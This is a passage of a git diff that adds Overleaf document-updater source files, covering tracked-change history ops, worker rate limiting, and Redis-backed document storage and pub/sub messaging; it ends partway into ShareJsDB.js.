* Deletes are moved forward by tracked deletes placed before or at the position of the + * op. If a tracked delete is inside the delete, the delete is split in parts + * so that characters are deleted around the tracked delete, but the tracked + * delete itself is not deleted. + * + * @param {DeleteOp} op + * @param {TrackedChange[]} changes + * @returns {HistoryDeleteOp} + */ +function getHistoryOpForDelete(op, changes, opts = {}) { + let hpos = op.p + const opEnd = op.p + op.d.length + /** @type HistoryDeleteTrackedChange[] */ + const changesInsideDelete = [] + for (const change of changes) { + if (change.op.p <= op.p) { + if (isDelete(change.op)) { + // Tracked delete is before or at the position of the incoming delete. + // Move the op forward. + hpos += change.op.d.length + } else if (isInsert(change.op)) { + const changeEnd = change.op.p + change.op.i.length + const endPos = Math.min(changeEnd, opEnd) + if (endPos > op.p) { + // Part of the tracked insert is inside the delete + changesInsideDelete.push({ + type: 'insert', + offset: 0, + length: endPos - op.p, + }) + } + } + } else if (change.op.p < op.p + op.d.length) { + // Tracked change inside the deleted text. Record it for the history system. + if (isDelete(change.op)) { + changesInsideDelete.push({ + type: 'delete', + offset: change.op.p - op.p, + length: change.op.d.length, + }) + } else if (isInsert(change.op)) { + changesInsideDelete.push({ + type: 'insert', + offset: change.op.p - op.p, + length: Math.min(change.op.i.length, opEnd - change.op.p), + }) + } + } else { + // We've seen all tracked changes before or inside the delete + break + } + } + + /** @type {HistoryDeleteOp} */ + const historyOp = { ...op } + if (hpos !== op.p) { + historyOp.hpos = hpos + } + if (changesInsideDelete.length > 0) { + historyOp.trackedChanges = changesInsideDelete + } + return historyOp +} + +/** + * Calculate history ops for a comment + * + * Comments are moved forward by tracked deletes placed before or at the + * position of the op. If a tracked delete is inside the comment, the length of + * the comment is extended to include the tracked delete. + * + * @param {CommentOp} op + * @param {TrackedChange[]} changes + * @returns {HistoryCommentOp} + */ +function getHistoryOpForComment(op, changes) { + let hpos = op.p + let hlen = op.c.length + for (const change of changes) { + if (!isDelete(change.op)) { + // We're only interested in tracked deletes + continue + } + + if (change.op.p <= op.p) { + // Tracked delete is before or at the position of the incoming comment. + // Move the op forward. + hpos += change.op.d.length + } else if (change.op.p < op.p + op.c.length) { + // Tracked comment inside the comment. Extend the length + hlen += change.op.d.length + } else { + // We've seen all tracked deletes before or inside the comment + break + } + } + + /** @type {HistoryCommentOp} */ + const historyOp = { ...op } + if (hpos !== op.p) { + historyOp.hpos = hpos + } + if (hlen !== op.c.length) { + historyOp.hlen = hlen + } + return historyOp +} + +/** + * Return the ops necessary to properly crop comments when a tracked delete is + * received + * + * The editor treats a tracked delete as a proper delete and updates the + * comment range accordingly. The history doesn't do that and remembers the + * extent of the comment in the tracked delete. In order to keep the history + * consistent with the editor, we'll send ops that will crop the comment in + * the history. + * + * @param {DeleteOp} op + * @param {Comment[]} comments + * @returns {CommentOp[]} + */ +function getCroppedCommentOps(op, comments) { + const deleteStart = op.p + const deleteLength = op.d.length + const deleteEnd = deleteStart + deleteLength + + /** @type {HistoryCommentOp[]} */ + const historyCommentOps = [] + for (const comment of comments) { + const commentStart = comment.op.p + const commentLength = comment.op.c.length + const commentEnd = commentStart + commentLength + + if (deleteStart <= commentStart && deleteEnd > commentStart) { + // The comment overlaps the start of the comment or all of it. + const overlapLength = Math.min(deleteEnd, commentEnd) - commentStart + + /** @type {CommentOp} */ + const commentOp = { + p: deleteStart, + c: comment.op.c.slice(overlapLength), + t: comment.op.t, + } + if (comment.op.resolved) { + commentOp.resolved = true + } + + historyCommentOps.push(commentOp) + } else if ( + deleteStart > commentStart && + deleteStart < commentEnd && + deleteEnd >= commentEnd + ) { + // The comment overlaps the end of the comment. + const overlapLength = commentEnd - deleteStart + + /** @type {CommentOp} */ + const commentOp = { + p: commentStart, + c: comment.op.c.slice(0, -overlapLength), + t: comment.op.t, + } + if (comment.op.resolved) { + commentOp.resolved = true + } + + historyCommentOps.push(commentOp) + } + } + + return historyCommentOps +} + +module.exports = RangesManager diff --git a/services/document-updater/app/js/RateLimitManager.js b/services/document-updater/app/js/RateLimitManager.js new file mode 100644 index 0000000..6e10f26 --- /dev/null +++ b/services/document-updater/app/js/RateLimitManager.js @@ -0,0 +1,85 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RateLimiter +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') + +module.exports = RateLimiter = class RateLimiter { + constructor(number) { + if (number == null) { + number = 10 + } + this.ActiveWorkerCount = 0 + this.CurrentWorkerLimit = number + this.BaseWorkerCount = number + } + + _adjustLimitUp() { + this.CurrentWorkerLimit += 0.1 // allow target worker limit to increase gradually + return Metrics.gauge('currentLimit', Math.ceil(this.CurrentWorkerLimit)) + } + + _adjustLimitDown() { + this.CurrentWorkerLimit = Math.max( + this.BaseWorkerCount, + this.CurrentWorkerLimit * 0.9 + ) + logger.debug( + { currentLimit: Math.ceil(this.CurrentWorkerLimit) }, + 'reducing rate limit' + ) + return Metrics.gauge('currentLimit', Math.ceil(this.CurrentWorkerLimit)) + } + + _trackAndRun(task, callback) { + if (callback == null) { + callback = function () {} + } + this.ActiveWorkerCount++ + Metrics.gauge('processingUpdates', this.ActiveWorkerCount) + return task(err => { + this.ActiveWorkerCount-- + Metrics.gauge('processingUpdates', this.ActiveWorkerCount) + return callback(err) + }) + } + + run(task, callback) { + if (this.ActiveWorkerCount < this.CurrentWorkerLimit) { + // below the limit, just put the task in the background + this._trackAndRun(task, err => { + if (err) { + logger.error({ err }, 'error in background task') + } + }) + callback() // return immediately + if (this.CurrentWorkerLimit > this.BaseWorkerCount) { + return this._adjustLimitDown() + } + } else { + logger.debug( + { + active: this.ActiveWorkerCount, + currentLimit: Math.ceil(this.CurrentWorkerLimit), + }, + 'hit rate limit' + ) + return this._trackAndRun(task, err => { + if (err == null) { + this._adjustLimitUp() + } // don't increment rate limit if there was an error + return callback(err) + }) // only return after task completes + } + } +} diff --git a/services/document-updater/app/js/RealTimeRedisManager.js b/services/document-updater/app/js/RealTimeRedisManager.js new file mode 100644 index 0000000..08bf132 --- /dev/null +++ b/services/document-updater/app/js/RealTimeRedisManager.js @@ -0,0 +1,136 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const pubsubClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +const Keys = Settings.redis.documentupdater.key_schema +const logger = require('@overleaf/logger') +const os = require('node:os') +const crypto = require('node:crypto') +const metrics = require('./Metrics') + +const HOST = os.hostname() +const RND = crypto.randomBytes(4).toString('hex') // generate a random key for this process +let COUNT = 0 + +const MAX_OPS_PER_ITERATION = 8 // process a limited number of ops for safety + +const RealTimeRedisManager = { + getPendingUpdatesForDoc(docId, callback) { + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.llen(Keys.pendingUpdates({ doc_id: docId })) + multi.lrange( + Keys.pendingUpdates({ doc_id: docId }), + 0, + MAX_OPS_PER_ITERATION - 1 + ) + multi.ltrim( + Keys.pendingUpdates({ doc_id: docId }), + MAX_OPS_PER_ITERATION, + -1 + ) + return multi.exec(function (error, replys) { + if (error != null) { + return callback(error) + } + const [llen, jsonUpdates, _trimResult] = replys + metrics.histogram( + 'redis.pendingUpdates.llen', + llen, + [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25, 50, 75, 100] + ) + for (const jsonUpdate of jsonUpdates) { + // record metric for each update removed from queue + metrics.summary('redis.pendingUpdates', jsonUpdate.length, { + status: 'pop', + }) + } + const updates = [] + for (const jsonUpdate of jsonUpdates) { + let update + try { + update = JSON.parse(jsonUpdate) + } catch (e) { + return callback(e) + } + updates.push(update) + } + return callback(error, updates) + }) + }, + + getUpdatesLength(docId, callback) { + return rclient.llen(Keys.pendingUpdates({ doc_id: docId }), callback) + }, + + sendCanaryAppliedOp({ projectId, docId, op }) { + const ack = JSON.stringify({ v: op.v, doc: docId }).length + // Updates with op.dup===true will not get sent to other clients, they only get acked. + const broadcast = op.dup ? 0 : JSON.stringify(op).length + + const payload = JSON.stringify({ + message: 'canary-applied-op', + payload: { + ack, + broadcast, + docId, + projectId, + source: op.meta.source, + }, + }) + + // Publish on the editor-events channel of the project as real-time already listens to that before completing the connection startup. + + // publish on separate channels for individual projects and docs when + // configured (needs realtime to be configured for this too). + if (Settings.publishOnIndividualChannels) { + return pubsubClient.publish(`editor-events:${projectId}`, payload) + } else { + return pubsubClient.publish('editor-events', payload) + } + }, + + sendData(data) { + // create a unique message id using a counter + const messageId = `doc:${HOST}:${RND}-${COUNT++}` + if (data != null) { + data._id = messageId + } + + const blob = JSON.stringify(data) + metrics.summary('redis.publish.applied-ops', blob.length) + + // publish on separate channels for individual projects and docs when + // configured (needs realtime to be configured for this too). + if (Settings.publishOnIndividualChannels) { + return pubsubClient.publish(`applied-ops:${data.doc_id}`, blob) + } else { + return pubsubClient.publish('applied-ops', blob) + } + }, +} + +module.exports = RealTimeRedisManager +module.exports.promises = promisifyAll(RealTimeRedisManager, { + without: ['sendData'], +}) diff --git a/services/document-updater/app/js/RedisManager.js b/services/document-updater/app/js/RedisManager.js new file mode 100644 index 0000000..f8e97f3 --- /dev/null +++ b/services/document-updater/app/js/RedisManager.js @@ -0,0 +1,796 @@ +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { promisifyAll } = require('@overleaf/promise-utils') +const metrics = require('./Metrics') +const Errors = require('./Errors') +const crypto = require('node:crypto') +const async = require('async') +const { docIsTooLarge } = require('./Limits') + +// Sometimes Redis calls take an unexpectedly long time. We have to be +// quick with Redis calls because we're holding a lock that expires +// after 30 seconds. We can't let any errors in the rest of the stack +// hold us up, and need to bail out quickly if there is a problem. +const MAX_REDIS_REQUEST_LENGTH = 5000 // 5 seconds +const PROJECT_BLOCK_TTL_SECS = 30 + +// Make times easy to read +const minutes = 60 // seconds for Redis expire + +const logHashReadErrors = Settings.documentupdater?.logHashErrors?.read + +const MEGABYTES = 1024 * 1024 +const MAX_RANGES_SIZE = 3 * MEGABYTES + +const keys = Settings.redis.documentupdater.key_schema + +const RedisManager = { + rclient, + + putDocInMemory( + projectId, + docId, + docLines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport, + _callback + ) { + const timer = new metrics.Timer('redis.put-doc') + const callback = error => { + timer.done() + _callback(error) + } + const docLinesArray = docLines + docLines = JSON.stringify(docLines) + if (docLines.indexOf('\u0000') !== -1) { + const error = new Error('null bytes found in doc lines') + // this check was added to catch memory corruption in JSON.stringify. + // It sometimes returned null bytes at the end of the string. + logger.error({ err: error, docId, docLines }, error.message) + return callback(error) + } + // Do an optimised size check on the docLines using the serialised + // length as an upper bound + const sizeBound = docLines.length + if (docIsTooLarge(sizeBound, docLinesArray, Settings.max_doc_length)) { + const docSize = docLines.length + const err = new Error('blocking doc insert into redis: doc is too large') + logger.error({ projectId, docId, err, docSize }, err.message) + return callback(err) + } + const docHash = RedisManager._computeHash(docLines) + // record bytes sent to redis + metrics.summary('redis.docLines', docLines.length, { status: 'set' }) + logger.debug( + { projectId, docId, version, docHash, pathname, projectHistoryId }, + 'putting doc in redis' + ) + RedisManager._serializeRanges(ranges, (error, ranges) => { + if (error) { + logger.error({ err: error, docId, projectId }, error.message) + return callback(error) + } + + // update docsInProject set before writing doc contents + const multi = rclient.multi() + multi.exists(keys.projectBlock({ project_id: projectId })) + multi.sadd(keys.docsInProject({ project_id: projectId }), docId) + multi.exec((err, reply) => { + if (err) { + return callback(err) + } + const projectBlocked = reply[0] === 1 + if (projectBlocked) { + // We don't clean up the spurious docId added in the docsInProject + // set. There is a risk that the docId was successfully added by a + // concurrent process. This set is used when unloading projects. An + // extra docId will not prevent the project from being uploaded, but + // a missing docId means that the doc might stay in Redis forever. + return callback( + new OError('Project blocked from loading docs', { projectId }) + ) + } + + RedisManager.setHistoryRangesSupportFlag( + docId, + historyRangesSupport, + err => { + if (err) { + return callback(err) + } + + if (!pathname) { + metrics.inc('pathname', 1, { + path: 'RedisManager.setDoc', + status: pathname === '' ? 'zero-length' : 'undefined', + }) + } + + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.mset({ + [keys.docLines({ doc_id: docId })]: docLines, + [keys.projectKey({ doc_id: docId })]: projectId, + [keys.docVersion({ doc_id: docId })]: version, + [keys.docHash({ doc_id: docId })]: docHash, + [keys.ranges({ doc_id: docId })]: ranges, + [keys.pathname({ doc_id: docId })]: pathname, + [keys.projectHistoryId({ doc_id: docId })]: projectHistoryId, + }) + if (historyRangesSupport) { + multi.del(keys.resolvedCommentIds({ doc_id: docId })) + if (resolvedCommentIds.length > 0) { + multi.sadd( + keys.resolvedCommentIds({ doc_id: docId }), + ...resolvedCommentIds + ) + } + } + multi.exec(err => { + if (err) { + callback( + OError.tag(err, 'failed to write doc to Redis in MULTI', { + previousErrors: err.previousErrors.map(e => ({ + name: e.name, + message: e.message, + command: e.command, + })), + }) + ) + } else { + callback() + } + }) + } + ) + }) + }) + }, + + removeDocFromMemory(projectId, docId, _callback) { + logger.debug({ projectId, docId }, 'removing doc from redis') + const callback = err => { + if (err) { + logger.err({ projectId, docId, err }, 'error removing doc from redis') + _callback(err) + } else { + logger.debug({ projectId, docId }, 'removed doc from redis') + _callback() + } + } + + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + let multi = rclient.multi() + multi.strlen(keys.docLines({ doc_id: docId })) + multi.del( + keys.docLines({ doc_id: docId }), + keys.projectKey({ doc_id: docId }), + keys.docVersion({ doc_id: docId }), + keys.docHash({ doc_id: docId }), + keys.ranges({ doc_id: docId }), + keys.pathname({ doc_id: docId }), + keys.projectHistoryId({ doc_id: docId }), + keys.unflushedTime({ doc_id: docId }), + keys.lastUpdatedAt({ doc_id: docId }), + keys.lastUpdatedBy({ doc_id: docId }), + keys.resolvedCommentIds({ doc_id: docId }) + ) + multi.exec((error, response) => { + if (error) { + return callback(error) + } + const length = response?.[0] + if (length > 0) { + // record bytes freed in redis + metrics.summary('redis.docLines', length, { status: 'del' }) + } + + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + multi = rclient.multi() + multi.srem(keys.docsInProject({ project_id: projectId }), docId) + multi.del(keys.projectState({ project_id: projectId })) + multi.exec(err => { + if (err) { + return callback(err) + } + rclient.srem(keys.historyRangesSupport(), docId, callback) + }) + }) + }, + + checkOrSetProjectState(projectId, newState, callback) { + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.getset(keys.projectState({ project_id: projectId }), newState) + multi.expire(keys.projectState({ project_id: projectId }), 30 * minutes) + multi.exec((error, response) => { + if (error) { + return callback(error) + } + logger.debug( + { projectId, newState, oldState: response[0] }, + 'checking project state' + ) + callback(null, response[0] !== newState) + }) + }, + + clearProjectState(projectId, callback) { + rclient.del(keys.projectState({ project_id: projectId }), callback) + }, + + getDoc(projectId, docId, callback) { + const timer = new metrics.Timer('redis.get-doc') + const collectKeys = [ + keys.docLines({ doc_id: docId }), + keys.docVersion({ doc_id: docId }), + keys.docHash({ doc_id: docId }), + keys.projectKey({ doc_id: docId }), + keys.ranges({ doc_id: docId }), + keys.pathname({ doc_id: docId }), + keys.projectHistoryId({ doc_id: docId }), + keys.unflushedTime({ doc_id: docId }), + keys.lastUpdatedAt({ doc_id: docId }), + keys.lastUpdatedBy({ doc_id: docId }), + ] + rclient.mget(...collectKeys, (error, result) => { + if (error) { + return callback(error) + } + let [ + docLines, + version, + storedHash, + docProjectId, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + ] = result + rclient.sismember(keys.historyRangesSupport(), docId, (error, result) => { + if (error) { + return callback(error) + } + rclient.smembers( + keys.resolvedCommentIds({ doc_id: docId }), + (error, resolvedCommentIds) => { + if (error) { + return callback(error) + } + + const historyRangesSupport = result === 1 + + const timeSpan = timer.done() + // check if request took too long and bail out. only do this for + // get, because it is the first call in each update, so if this + // passes we'll assume others have a reasonable chance to succeed. + if (timeSpan > MAX_REDIS_REQUEST_LENGTH) { + error = new Error('redis getDoc exceeded timeout') + return callback(error) + } + // record bytes loaded from redis + if (docLines != null) { + metrics.summary('redis.docLines', docLines.length, { + status: 'get', + }) + } + // check sha1 hash value if present + if (docLines != null && storedHash != null) { + const computedHash = RedisManager._computeHash(docLines) + if (logHashReadErrors && computedHash !== storedHash) { + logger.error( + { + projectId, + docId, + docProjectId, + computedHash, + storedHash, + docLines, + }, + 'hash mismatch on retrieved document' + ) + } + } + + try { + docLines = JSON.parse(docLines) + ranges = RedisManager._deserializeRanges(ranges) + } catch (e) { + return callback(e) + } + + version = parseInt(version || 0, 10) + // check doc is in requested project + if (docProjectId != null && docProjectId !== projectId) { + logger.error( + { projectId, docId, docProjectId }, + 'doc not in project' + ) + return callback(new Errors.NotFoundError('document not found')) + } + + if (docLines && version && !pathname) { + metrics.inc('pathname', 1, { + path: 'RedisManager.getDoc', + status: pathname === '' ? 'zero-length' : 'undefined', + }) + } + + callback( + null, + docLines, + version, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + historyRangesSupport, + resolvedCommentIds + ) + } + ) + }) + }) + }, + + getDocVersion(docId, callback) { + rclient.mget(keys.docVersion({ doc_id: docId }), (error, result) => { + if (error) { + return callback(error) + } + let [version] = result || [] + version = parseInt(version, 10) + callback(null, version) + }) + }, + + getDocLines(docId, callback) { + rclient.get(keys.docLines({ doc_id: docId }), (error, docLines) => { + if (error) { + return callback(error) + } + callback(null, docLines) + }) + }, + + getPreviousDocOps(docId, start, end, callback) { + const timer = new metrics.Timer('redis.get-prev-docops') + rclient.llen(keys.docOps({ doc_id: docId }), (error, length) => { + if (error) { + return callback(error) + } + rclient.get(keys.docVersion({ doc_id: docId }), (error, version) => { + if (error) { + return callback(error) + } + version = parseInt(version, 10) + const firstVersionInRedis = version - length + + if (start < firstVersionInRedis || end > version) { + error = new Errors.OpRangeNotAvailableError( + 'doc ops range is not loaded in redis', + { firstVersionInRedis, version, ttlInS: RedisManager.DOC_OPS_TTL } + ) + logger.debug( + { err: error, docId, length, version, start, end }, + 'doc ops range is not loaded in redis' + ) + return callback(error) + } + + start = start - firstVersionInRedis + if (end > -1) { + end = end - firstVersionInRedis + } + + if (isNaN(start) || isNaN(end)) { + error = new Error('inconsistent version or lengths') + logger.error( + { err: error, docId, length, version, start, end }, + 'inconsistent version or length' + ) + return callback(error) + } + + rclient.lrange( + keys.docOps({ doc_id: docId }), + start, + end, + (error, jsonOps) => { + let ops + if (error) { + return callback(error) + } + try { + ops = jsonOps.map(jsonOp => JSON.parse(jsonOp)) + } catch (e) { + return callback(e) + } + const timeSpan = timer.done() + if (timeSpan > MAX_REDIS_REQUEST_LENGTH) { + error = new Error('redis getPreviousDocOps exceeded timeout') + return callback(error) + } + callback(null, ops) + } + ) + }) + }) + }, + + DOC_OPS_TTL: 60 * minutes, + DOC_OPS_MAX_LENGTH: 100, + updateDocument( + projectId, + docId, + docLines, + newVersion, + appliedOps, + ranges, + updateMeta, + callback + ) { + if (appliedOps == null) { + appliedOps = [] + } + RedisManager.getDocVersion(docId, (error, currentVersion) => { + if (error) { + return callback(error) + } + if (currentVersion + appliedOps.length !== newVersion) { + error = new Error(`Version mismatch. '${docId}' is corrupted.`) + logger.error( + { + err: error, + docId, + currentVersion, + newVersion, + opsLength: appliedOps.length, + }, + 'version mismatch' + ) + return callback(error) + } + + const jsonOps = appliedOps.map(op => JSON.stringify(op)) + for (const op of jsonOps) { + if (op.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in jsonOps') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, jsonOps }, error.message) + return callback(error) + } + } + + const newDocLines = JSON.stringify(docLines) + if (newDocLines.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in doc lines') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, newDocLines }, error.message) + return callback(error) + } + // Do an optimised size check on the docLines using the serialised + // length as an upper bound + const sizeBound = newDocLines.length + if (docIsTooLarge(sizeBound, docLines, Settings.max_doc_length)) { + const err = new Error('blocking doc update: doc is too large') + const docSize = newDocLines.length + logger.error({ projectId, docId, err, docSize }, err.message) + return callback(err) + } + const newHash = RedisManager._computeHash(newDocLines) + + const opVersions = appliedOps.map(op => op?.v) + logger.debug( + { + docId, + version: newVersion, + hash: newHash, + opVersions, + }, + 'updating doc in redis' + ) + // record bytes sent to redis in update + metrics.summary('redis.docLines', newDocLines.length, { + status: 'update', + }) + RedisManager._serializeRanges(ranges, (error, ranges) => { + if (error) { + logger.error({ err: error, docId }, error.message) + return callback(error) + } + if (ranges && ranges.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in ranges') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, ranges }, error.message) + return callback(error) + } + + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.mset({ + [keys.docLines({ doc_id: docId })]: newDocLines, + [keys.docVersion({ doc_id: docId })]: newVersion, + [keys.docHash({ doc_id: docId })]: newHash, + [keys.ranges({ doc_id: docId })]: ranges, + [keys.lastUpdatedAt({ doc_id: docId })]: Date.now(), + [keys.lastUpdatedBy({ doc_id: docId })]: + updateMeta && updateMeta.user_id, + }) + multi.ltrim( + keys.docOps({ doc_id: docId }), + -RedisManager.DOC_OPS_MAX_LENGTH, + -1 + ) // index 3 + // push the ops last so we can get the lengths at fixed index position 7 + if (jsonOps.length > 0) { + multi.rpush(keys.docOps({ doc_id: docId }), ...jsonOps) // index 5 + // expire must come after rpush since before it will be a no-op if the list is empty + multi.expire(keys.docOps({ doc_id: docId }), RedisManager.DOC_OPS_TTL) // index 6 + } + // Set the unflushed timestamp to the current time if not set ("NX" flag). + multi.set(keys.unflushedTime({ doc_id: docId }), Date.now(), 'NX') + multi.exec((error, result) => { + if (error) { + return callback(error) + } + callback() + }) + }) + }) + }, + + renameDoc(projectId, docId, userId, update, projectHistoryId, callback) { + RedisManager.getDoc(projectId, docId, (error, lines, version) => { + if (error) { + return callback(error) + } + if (lines != null && version != null) { + if (!update.newPathname) { + logger.warn( + { projectId, docId, update }, + 'missing pathname in RedisManager.renameDoc' + ) + metrics.inc('pathname', 1, { + path: 'RedisManager.renameDoc', + status: update.newPathname === '' ? 'zero-length' : 'undefined', + }) + } + rclient.set( + keys.pathname({ doc_id: docId }), + update.newPathname, + callback + ) + } else { + callback() + } + }) + }, + + clearUnflushedTime(docId, callback) { + rclient.del(keys.unflushedTime({ doc_id: docId }), callback) + }, + + updateCommentState(docId, commentId, resolved, callback) { + if (resolved) { + rclient.sadd( + keys.resolvedCommentIds({ doc_id: docId }), + commentId, + callback + ) + } else { + rclient.srem( + keys.resolvedCommentIds({ doc_id: docId }), + commentId, + callback + ) + } + }, + + getDocIdsInProject(projectId, callback) { + rclient.smembers(keys.docsInProject({ project_id: projectId }), callback) + }, + + /** + * Get lastupdatedat timestamps for an array of docIds + */ + getDocTimestamps(docIds, callback) { + async.mapSeries( + docIds, + (docId, cb) => rclient.get(keys.lastUpdatedAt({ doc_id: docId }), cb), + callback + ) + }, + + /** + * Store the project id in a sorted set ordered by time with a random offset + * to smooth out spikes + */ + queueFlushAndDeleteProject(projectId, callback) { + const SMOOTHING_OFFSET = + Settings.smoothingOffset > 0 + ? Math.round(Settings.smoothingOffset * Math.random()) + : 0 + rclient.zadd( + keys.flushAndDeleteQueue(), + Date.now() + SMOOTHING_OFFSET, + projectId, + callback + ) + }, + + /** + * Find the oldest queued flush that is before the cutoff time + */ + getNextProjectToFlushAndDelete(cutoffTime, callback) { + rclient.zrangebyscore( + keys.flushAndDeleteQueue(), + 0, + cutoffTime, + 'WITHSCORES', + 'LIMIT', + 0, + 1, + (err, reply) => { + if (err) { + return callback(err) + } + // return if no projects ready to be processed + if (!reply || reply.length === 0) { + return callback() + } + // pop the oldest entry (get and remove in a multi) + const multi = rclient.multi() + // Poor man's version of ZPOPMIN, which is only available in Redis 5. + multi.zrange(keys.flushAndDeleteQueue(), 0, 0, 'WITHSCORES') + multi.zremrangebyrank(keys.flushAndDeleteQueue(), 0, 0) + multi.zcard(keys.flushAndDeleteQueue()) // the total length of the queue (for metrics) + multi.exec((err, reply) => { + if (err) { + return callback(err) + } + if (!reply || reply.length === 0) { + return callback() + } + const [key, timestamp] = reply[0] + const queueLength = reply[2] + callback(null, key, timestamp, queueLength) + }) + } + ) + }, + + setHistoryRangesSupportFlag(docId, historyRangesSupport, callback) { + if (historyRangesSupport) { + rclient.sadd(keys.historyRangesSupport(), docId, callback) + } else { + rclient.srem(keys.historyRangesSupport(), docId, callback) + } + }, + + blockProject(projectId, callback) { + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.setex( + keys.projectBlock({ project_id: projectId }), + PROJECT_BLOCK_TTL_SECS, + '1' + ) + multi.scard(keys.docsInProject({ project_id: projectId })) + multi.exec((err, reply) => { + if (err) { + return callback(err) + } + const docsInProject = reply[1] + if (docsInProject > 0) { + // Too late to lock the project + rclient.del(keys.projectBlock({ project_id: projectId }), err => { + if (err) { + return callback(err) + } + callback(null, false) + }) + } else { + callback(null, true) + } + }) + }, + + unblockProject(projectId, callback) { + rclient.del(keys.projectBlock({ project_id: projectId }), (err, reply) => { + if (err) { + return callback(err) + } + const wasBlocked = reply === 1 + callback(null, wasBlocked) + }) + }, + + _serializeRanges(ranges, callback) { + let jsonRanges = JSON.stringify(ranges) + if (jsonRanges && jsonRanges.length > MAX_RANGES_SIZE) { + return callback(new Error('ranges are too large')) + } + if (jsonRanges === '{}') { + // Most doc will have empty ranges so don't fill redis with lots of '{}' keys + jsonRanges = null + } + callback(null, jsonRanges) + }, + + _deserializeRanges(ranges) { + if (ranges == null || ranges === '') { + return {} + } else { + return JSON.parse(ranges) + } + }, + + _computeHash(docLines) { + // use sha1 checksum of doclines to detect data corruption. + // + // note: must specify 'utf8' encoding explicitly, as the default is + // binary in node < v5 + return crypto.createHash('sha1').update(docLines, 'utf8').digest('hex') + }, +} + +module.exports = RedisManager +module.exports.promises = promisifyAll(RedisManager, { + without: ['_deserializeRanges', '_computeHash'], + multiResult: { + getDoc: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'lastUpdatedAt', + 'lastUpdatedBy', + 'historyRangesSupport', + 'resolvedCommentIds', + ], + getNextProjectToFlushAndDelete: [ + 'projectId', + 'flushTimestamp', + 'queueLength', + ], + }, +}) diff --git a/services/document-updater/app/js/ShareJsDB.js b/services/document-updater/app/js/ShareJsDB.js new file mode 100644 index 0000000..5e9c517 --- /dev/null +++ b/services/document-updater/app/js/ShareJsDB.js @@ -0,0 +1,147 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ShareJsDB +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Keys = require('./UpdateKeys') +const RedisManager = require('./RedisManager') +const Errors = require('./Errors') + +const TRANSFORM_UPDATES_COUNT_BUCKETS = [ + 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25, 50, 75, 100, + // prepare buckets for full-project history/larger buffer experiments + 150, 200, 300, 400, +] + +module.exports = ShareJsDB = class ShareJsDB { + constructor(projectId, docId, lines, version) { + this.project_id = projectId + this.doc_id = docId + this.lines = lines + this.version = version + this.appliedOps = {} + // ShareJS calls this detacted from the instance, so we need + // bind it to keep our context that can access @appliedOps + this.writeOp = this._writeOp.bind(this) + this.startTimeShareJsDB = performance.now() + } + + getOps(docKey, start, end, callback) { + if (start === end || (start === this.version && end === null)) { + const status = 'is-up-to-date' + Metrics.inc('transform-updates', 1, { + status, + path: 'sharejs', + }) + Metrics.histogram( + 